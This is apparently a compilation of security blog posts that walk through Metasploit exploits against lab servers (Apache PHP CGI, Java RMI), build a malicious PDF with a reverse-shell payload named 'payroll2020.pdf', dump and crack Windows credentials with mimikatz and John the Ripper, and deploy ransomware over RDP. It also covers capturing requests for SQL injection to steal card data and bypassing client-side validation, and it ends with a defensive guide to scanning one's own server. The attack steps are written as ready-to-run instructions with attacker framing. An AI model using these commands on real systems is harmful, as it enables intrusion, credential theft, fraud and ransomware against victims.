Hacking web servers – Apache PHP CGI (Easy Hacking)

Apache is widely used on hundreds of thousands of web servers across the internet. Therefore the chances of finding Apache servers which are running older versions is highly likely, and with hundreds of vulnerabilities coming to light over the years it is all too easy to find an exploit for older versions and gain a root shell. Here we find a server running Apache 2.2.8 on port 80 and show how we can then fully compromise the server in under 3 minutes, and access the password file.

We touch on this time and again just how important it is to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server it is at risk of being compromised very quickly.

In this tutorial we are using just nmap and metasploit framework which are built into Kali linux which we use for most of our tutorials. Download is here; https://www.kali.org/downloads/

First we scan the web server which has an IP address of 192.168.56.103 with nmap to identify open ports and the services running on those ports using the following cmd.

nmap -sV -sT –version-all -p 80 192.168.56.103

There is a great cheat sheet here for nmap cmds to help better understand what we are doing; https://www.stationx.net/nmap-cheat-sheet/

This shows us that port 80- is open, that it is running Apache and it gives us the version. All we do from here is go googling to find vulnerabilities for that version, and the year that version came out. Then we can choose either to target the version directly or find an exploit that came out after that version was released. You can use CVE numbers for that as the first part denotes the year is was discovered.

Apache 2.2.8 was released on the 19th of January, 2008!! Let’s look for a CVE from after that date and one that is already available in metasploit framework.

I’m not going to teach you how to google…….but my search brought up a vulnerability in a php cgi script which was the default for that version of Apache. There will be loads of exploits available for this version due to it’s age, we just decided to use this one as it is super reliable for the video demo.

Let’s fire up metasploit and find it.

search type:exploit multi/http/php

We could has also searched by date. Anyway, the one we want is number 0 so we simply type

use 0

It has already configured a payload for us so we check the info on the exploit

show info

Once we’re happy we check which options we need to add to allow it to run.

show options

We can see in the options what is required and what is not by reading the “required” column.

The port is correct (80) we need to add RHOSTS and LHOST
  1. RHOSTS – This is the Remote hosts or the victim machines. We need to set the correct IP address so the exploit knows which machine(s) to target.
  2. LHOST – This is the listening host. This is your machines IP address so the exploit knows which machine to connect back to with the remote session spawned by the exploit.

We do this by using the “set” cmd

set RHOSTS 192.168.56.103

set LHOST 192.168.56.106

Now we have everything configured we just give the “run” cmd which starts the exploit against the victim, and you can see from the video just how quick it is.

All we do now access the password file by using;

cat /etc/passwd

“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can login as admin/root and do whatever we want.

Hacking web servers – Java (Easy Hacking)

Java is rarely updating on web servers and so more often than not when you see it on a web server it will be way out of date. This makes it easy for attackers to get in. Here we find a server running Java RMI on port 1099 and show how we can then fully compromise the server in under 3 minutes, and access the password file.

We touch on this time and again just how important it is to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server it is at risk of being compromised very quickly.

In this tutorial we are using just nmap and metasploit framework which are built into Kali linux which we use for most of our tutorials. Download is here; https://www.kali.org/downloads/

First we scan the web server which has an IP address of 192.168.56.103 with nmap to identify open ports and the services running on those ports using the following cmd.

nmap -sV 192.168.56.103

We can see Java RMI running on port 1099

Next we head over to the metasploit framework to search for any built in exploits we may be able to use.

search type:exploit platform:java rmi

The cmd above is pretty self explanatory, we are performing a search with a type of “exploit” for the platform “java” and addition item “rmi”. We recieve the following output;

See the highlighted module we will use

To load this module we use the “use” cmd

use exploit/multi/misc/java_rmi_server

It informs us it has already selected a payload so next we list the “info” page

info

Then once we are happy we know what we need to configure we load the options

show options

We can see in the options what is required and what is not by reading the “required” column.

Everything is set for us except the RHOSTS and LHOST settings which we need to ensure have the correct IP address.

  1. RHOSTS – This is the Remote hosts or the victim machines. We need to set the correct IP address so the exploit knows which machine(s) to target.
  2. LHOST – This is the listening host. This is your machines IP address so the exploit knows which machine to connect back to with the remote session spawned by the exploit.

We do this by using the “set” cmd

set RHOSTS 192.168.56.103

set LHOST 192.168.56.106

Now we have everything configured we just give the “run” cmd which starts the exploit against the victim, and you can see from the video just how quick it is.

All we do now in the demo video is run the “sysinfo” cmd to show we are on the victim server, and then we access the password file by using;

cat /etc/passwd

“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can login as admin/root and do whatever we want. All because no one updated Java!

How to capture a web page request – Stealing Customer Credit Card Details part 2

This a quick blog off the back of numerous requests for an additional guide for a video we posted on YouTube. https://www.youtube.com/watch?v=cThifvgCcPc

In the above video we show how you can steal credit card numbers straight out of the database by using a legitimate web page request and feeding this into sqlmap.

If you want to know how to capture the web request then this tutorial will show you.

In order to capture the request we need a proxy which sits between the website and our browser which will see the raw data of the requests and responses. This not only gives us visibility, it also gives us the ability to manipulate the requests, but we shall save this for future blogs.

In our demo we are using Kali from here; https://www.kali.org/downloads/ which is a hackers operating system which comes with a browser proxy pre-installed, and so we shall be using Burpsuite. You can install Burpsuite separately if you wish from here; https://portswigger.net/burp/communitydownload

However if you are just starting out then I recommend downloading Kali and installing on Virtualbox; https://www.virtualbox.org/wiki/Downloads as Kali also includes sqlmap which is the other application you need to complete the full attack as shown across both videos.

There are plenty of guides on YouTube so we won’t be covering installation here.

Let’s get to into it;

The reason this method works so well is because you are providing a LEGITIMATE request to the web server, what does this mean? Well, if you are not a member of a web site and you try and login you will get denied access as you don’t have valid credentials to login, this is not a legitimate request. If you are a member you provide your username and password and you are permitted access to the website, this is legitimate.

How does this help? Well alot of webistes have a “manage your account section”, “search for past purchases”, or “my payment information” all of which allow you to search information in your own account. If the website is not coded correctly however, you may be able to use this same search in YOUR account to actually return information from OTHER users accounts. This is where the legitimate response comes in. You are using a legitimate request to the website, and seeing if this can be manipulated to allow the return of more information that expected. This technique is called SQL Injection.

In this demo we are using an account details lookup page to perform this attack.

We are logged in as canaryman, and submit a search for our own account, and this completes as expected.

Burpsuite is already running, but in order for it to be able to intercept the requests we need to configure our browser to use Burpsuite as a proxy. For our machine we go to the browser settings > network settings > then configure as below;

It will be very similar for all browsers, the thing to remember is you are using your localhost address 127.0.0.1, and Burpsuite runs on port 8080.

We now perform the same search again but this time we go to the PROXY and INTERCEPT tabs, and set “intercept” to on. This catches the request as it leaves the browser and before it hits the web server.

We save this to a file as shown, then forward the request so it completes. That’s it.

Watch https://www.youtube.com/watch?v=cThifvgCcPc to see how this request is used to get other users credit card details from the website.

How to make a malicious pdf (Making Malware)

If you’ve ever wondered what it takes to make basic malware, then this is for you.

Malware sounds like a dark art, but put simply malware is just a computer application that does something on your machine which enables a criminal to achieve their goal. You might have Word.exe on your computer for creating and writing documents, well malware might be something like passpad.exe which steals passwords from the machine. Simple, and malware is as easy to make as any computer application, it works within all the same parameters as a legit application, it just depends on how complicated it has to be to fulfill it’s purpose.

In this video tutorial we will show you how using free software you can create a simple malicious PDF. In this PDF we will hide our malware.

We first fire up metasploit to create our new pdf.

We perform a search of known vulnerabilities and exploits available for us to use, then once we have picked what we want to use we start creating the document that we’ll send to our victim hoping they run it. Once we have created our pdf we upload to a webserver where it will be downloaded by our victim. More often that not this will be sent as a link in an email, but we use this method here to keep the video short. (We will cover emailing malware in a future video)

You see the connection to the attackers machine instantly as soon as the document is opened. You’ll notice the extra pop up box before the document opens, but you’ll be surprised how many users just click through without reading them or being suspicious! Again this is simple malware, with more time we can eliminate the amount of user interaction required to make it almost silent. We can also add content to the pdf so it looks like a real document and not just blank. Again, we will work through creating more convincing malware in future tutorials.

Meterpreter commands used in this video are;

  1. search type:exploit platform:windows adobe pdf Simple search of the database for exploits for our chosen victim.
  2. use exploit/windows/fileformat/adobe_pdf_embedded_exe  This selects the chosen exploit.
  3. show options lists the options required to build the pdf
  4. set payload windows/meterpreter/reverse_tcp the malicious payload hidden in the pdf
  5. set FILENAME payroll2020.pdf name the pdf
  6. set LHOST 192.168.56.106 set the IP address of the attacking machine so the exploit knows where to call back to
  7. show info displays information about the exploit.
  8. run creates the pdf
  9. use exploit/multi/handler selects the listener which “listens” for the malware to call home to connect
  10. set payload windows/meterpreter/reverse_tcp this matches the payload hidden in the document and should connect to the same IP unless you are using VPNs or proxies.
  11. show options lists the options required for the listener and payload
  12. set LHOST 192.168.56.106 set the IP address of the attacking machine to listen on.
  13. run starts the listener
  14. sysinfo; this gives us the info of the infected system we are connected to.
  15. shell; this launches a hidden Windows command prompt which allows you to run native Windows commands. Which we use to launch “notepad.exe” and “calc.exe” as a demonstration that we are on the victim PC.

In future videos we’ll also show you how to spot this type of malware and stop it. Well I hope this has been useful, until next time.

Deploying Ransomware (Hacking RDP Servers Part 4)

I hope you have enjoyed this short series of RDP hacking. The aim was to show how quickly things can snow ball when just one user becomes compromised on a shared resource like an RDP server. Anyway, back to this last video in the series.

If you haven’t watched the previous videos and you are not sure how we got to this point, I’d recommend watching them so you are up to speed.

As a recap we have compromised the guest user on an RDP server, then dumped all available credentials from memory, we then cracked the hashes and see what other credentials we get.

We managed to crack 3 of the hashes giving us the logins for the following accounts;

  1. backup.adm
  2. server.adm
  3. thirdparty.adm

We logged in with thirdparty.adm as in general these accounts are poorly maintained, and not regularly used. There are also used by lot’s of different support engineers so changes or suspicious activity is unlikely to be noticed, whereas an admin for the company themselves are usually more diligent.

We want to copy over some malicious files but find that clipboard/copy and paste is disabled for this account meaning we need to find another way to get our files on the target machine.

We start another listener in metasploit, then manually browse back to our evil website which we used to compromise the guest account as we know this works and was not spotted previously.

We download and run the malware which gives us a backdoor into the machine.

We then use meterpreter to upload our ransomware file which we will use to encrypt the entire server, and also download any files of interest. We take passwords file (Although in reality we would take a copy of EVERYTHING) as vendors will often reuse credentials so we save these for if we come across this thirdparty again or perhaps use them to start a targeted attack against the third party vendor. We could also take the installer, inject it with malware then upload to a “freeware” site offering it with licence keys for download to help us infect more machines. Everything can be used in some way to help us in our malicious activities.

Meterpreter commands used in this video are;

  • upload RansomwareFile.Docx.bat c:\\users\\thirdparty.adm\\Documents\\RansomwareFile.docx.bat; Here we use the “upload” command, followed by our ransomware malware file, then state the location on the victim we wish to upload the file to. Note the double back slash.
  • download c:\\users\\thirdparty.adm\\Documents\\passwords.rft  Here we simply use the “download” command and state the file and location. Note the double back slash.

Once we have stolen all we want, we just need to run our malware. Now we want to ensure that it runs with the highest permissions so it has access to as much data across the machine as possible. This is where we will use the server.adm, or backup.adm accounts if we need them.

We right click to run our malicious file as administrator and bingo, we do not even need our other accounts. The third party account is running with local admin so our ransomware completes without issue. Success!

Hope you enjoy the video, and this series. We will pick a new topic and do another short series.

Cracking password hashes (Hacking RDP Servers Part 3)

In the 2 previous videos we have shown how by compromising just one user on an RDP server we can steal the hashed passwords of all logged in users. In part 3 we show how to crack those hashes to reveal the plain text passwords.

If you haven’t watched the previous videos and you are not sure how we got to this point, I’d recommend watching them so you are up to speed.

As a recap we have compromised the guest user on an RDP server, then dumped all available credentials from memory ready for us to crack the hashes and see what other credentials we get.

We copy these hashes over as shown in the video and save them in a file named “StolenCredsJohn” using the shown format of username:hash

We also have a file named “small-wordlist1.txt” which is a file of usernames we want to test against the hashes we have. There are of course massive wordslists which contain BILLIONS of passwords, however here we have carried out some intel of the victim organisation and found some details of previous breaches so have created a custom wordlist.

The program we are using to crack the hashes is John The Ripper. There are plenty of other programs out there but I prefer John which allows you to create custom rule sets and combine those with custom wordlists.

To use John we simply provide switches which state; NOTE you need double dashes to enable the switches below. They may display as single dashes below in some browsers, or may show as having a space between the dashes in others. It is shown clearly in the video below)

  • Hash type (NTLM, MD5, for example). – -format=
  • The file name of the stolen hashes
  • The file name of the wordlist we will use. – -wordlist=

The John The Ripper commands we use in this video are:

  • John – -format=NT – -wordlist=small-wordlist.txt StolenCredsJohn; use john to crack the hash file “StolenCredsJohn” using the wordlist “small-wordlist1.txt”
  • John – -show – -format=NT StolenCredsJohn show the cracked hashes from the file “StolenCredsJohn”

Once we have the cracked hashes we then use them to login to the RDP server undetected. Using legitimate credentials means there is nothing malicious for the Anti-Virus to detect.

Stealing credentials of all logged in users. (Hacking RDP Servers Part 2)

In the previous video we got a foot hold on the victim machine and managed to elevate ourselves to SYSTEM. At this point though a restart of the server, or a simple glitch will see us booted off the server losing our connection, and putting us back to square one. What if we can get some credentials for the rdp server? Then we could just login whenever we wanted with legitimate credentials and there would be no malware on the victim that might be flagged by the anti-virus…..perfect!

If you haven’t watched the previous video and you are not sure how we got to this point, I’d recommend watching it so you are up to speed.

We already have kiwi loaded so we run the help command to see what’s available, and we can dump the contents of the SAM file. The Security Account Manager is a database file that stores the passwords for accounts which use the computer/server.

You can see we get 6 user names and their corresponding password hashes. We only need one weak password which we can crack and bingo we have an in.

We will cover cracking NTLM hashes in the next video of this series.

Next we migrate to a different process. On a system processes are continually opened and closed and so sometimes if you are running inside Word or Excel for example, you will lose your connection to the victim when they close that particular program or application. Therefore we want to run inside something which is much less likely to be closed.

Here we demonstrate how simple this is, especially if you already have SYSTEM level permissions. This is again why level privilege is so important, as it can mean the difference between an attacker being on a victim machine, but unable to do anything as the user account is locked down and they just simply get booted off when the computer is restarted. Or if with elevated permissions, they can easily migrate through running processes, further elevating their privileges easily as they go. (It takes 3 attempts in the video as I mess up and chose the wrong number value – whoops!)

The Meterpreter commands we run in this video are:

kiwi help; brings up the command menu for kiwi (mimikatz)

lsa_dump_sam; dumps the sam database file on screen.

ps ; lists running processes on the victim machine

migrate; state the PID number of the process you wish to migrate to and your malicious process will move from where it is currently running to the stated process.

Why “Least Privilege” is important. (Hacking RDP Servers Part 1)

Welcome back, this is a simple demo to show why you don’t use administrator rights with normal everyday accounts you use for email and web browsing. It’s something you may hear all the time, but it’s not easy to understand what the big deal is if you don’t know.

In the video we have the attacker on the left and the victim on the right.

We have used the metasploit framework to create a simple malicious .exe (we will cover creating this in a separate video), which we have uploaded to our web server which hosts the malicious file. We then start our metasploit framework listener which, when the malware is clicked will, connect to the victim machine.

The victim machine is running server 2008R2 and is a simple RDP server which is used by multiple users in our fake organisation for various different tasks.

What you will see is that when the victim user is NOT a member of the administrators group when the malware is clicked and the user clicks past the warning, it still fails to run as they do not have sufficient rights. We then run the same test with the same malware, but this time we add the user to the administrators group, and of course the malware runs and we get full access to the victim server. We will cover some of the things we can do once we have a foothold on the machine in the next video.

The Meterpreter commands we run in this video are:

sysinfo; this gives us the info of the infected system we are connected to.

shell; this launches a hidden Windows command prompt which allows you to run native Windows commands. Which we use to launch “notepad.exe” as a demonstration.

load kiwi; mimikatz (if you don’t know what this is go have a look online) has been ported into Metasploit and when you load the extension you can use it straight from the meterpreter session.

getuid; shows who we are currently running as on the victim server. This video shows us moving from Guest to SYSTEM.

getsystem; meterpreter tries a built in script of techniques to attempt to get SYSTEM level access. This means your malicious actions will now be run as SYSTEM.

Come back for the next video where we dump the hashed passwords of all the logged in users

Bypass Client Side Validation in a website. Getting Admin.

A quick video showing why you need both server and client side input validation. Here we bypass client side validation using Burp Suite browser proxy to change our input from our valid credentials for the site to get logged in as admin with a simple SQL injection statement. Server side validation would prevent this attack. This method gets us admin in less than a minute, leaving us free to do whatever we want. Here we right a blog entry however we could obviously do a lot more with admin for the website.

This is a very basic demo to keep it simple, however it clearly shows the principles behind this type of attack. Filtering dangerous characters in the browser is not enough, you must perform server side checks as well.

How to check your own server and website. (QGR)

If you have been following the previous QGR’s and the past few posts we have shown how to install LEMP on Ubuntu, and make sure we have carried out some basic hardening of the OS.

We can verify this internally by checking versions on the server but how do we get the external view and see what an attacker would see? Again, this does not need to be extremely expensive. Let’s dive in and look at some great, freely available tools.

Below is a list of free resources we are going to use in this guide.

Nmap free network scanner download

https://nmap.org/

Immuniweb free website scanner

https://www.immuniweb.com/websec

Free web security headers report

https://securityheaders.com/

Free WordPress website scanner

https://wpsec.com

OK, now you have all the links, let’s get started.

nmap

nmap is a free network scanner and we can use this to verify that our firewall is set correctly, and the exposed applications are running the latest versions. Let’s fire it up and scan our site.

nmap info.2code-monte.co.uk

This performs a basic scan of our webserver and the top 1000 ports. (we will cover more advanced scanning in a later post) The results are shown below.

This shows that as expected our server has only 3 ports exposed to the internet. Now let’s do a version check on those services by adding the “-sV” flag.

nmap -sV info.2code-monte.co.uk

We can now see the versions, a quick google shows we are on the latest versions, so we can move on.

If you want to scan all ports then add the “-p” flag, and port range as below

nmap -p 0-65535 info.2code-monte.co.uk

immuniweb scan

Right let’s go to immuniwebs site and using the free web scanner let’s scan our site by selecting “community Edition”, and “Website Security Test”.

After around 10 minutes you will get a report as shown below

This report will provide remediation advice if an issues are found so have a good read through. We will come back to these reports in later posts to show best practice configuration, and other tips.

Security Headers

Security headers are important for website security, not only for your site, but also for anyone who visits your site. Browse to the Security Headers website and start a scan. As before after a short while you will receive a report for your site as shown below.

This also has some great resources for helping you to understand what each finding means and how to remediate any issues. As with the other tests, we will come back to these in the next post.

WordPress Security

If you are using WordPress, and making use of themes and plugins it is vital you ensure you are keeping everything up to date. That means the version of WordPress itself, the current live theme, and all plugins you have installed.

Luckily there are free tools for this as well, so lets head over to the wpsec website and launch the scan.

Simply pop in your website URL , tick the box and off we go.

If there are any issues it will tell you on this page,and you can sign up for a free account to receive a more in-depth report.